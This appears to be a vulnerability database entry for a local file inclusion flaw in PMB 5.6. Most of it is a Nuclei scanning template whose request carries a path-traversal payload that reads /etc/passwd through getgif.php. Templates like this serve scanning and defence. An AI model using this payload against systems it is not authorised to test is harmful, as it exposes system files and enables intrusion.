pmb-local-file-disclosure: PMB 5.6 - Local File Inclusion

日期: 2025-08-01 | 影响软件: PMB 5.6 | POC: 已公开

漏洞描述

PMB 5.6 is vulnerable to local file inclusion.

PoC代码[已公开]

id: pmb-local-file-disclosure

info:
  name: PMB 5.6 - Local File Inclusion
  author: dhiyaneshDk
  severity: high
  description: PMB 5.6 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/49054
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,pmb,edb,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif={{rand_base(4)}}'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210094205a636a249e88278cdc00d420a95e6f06102ee0f6dca98eedd45d492bca52022100bb62197726817f6bea754808f9ddf3cf7d7657fd3a8e770b9ba5df3fa962454d:922c64590222798bb761d5b6d8e72950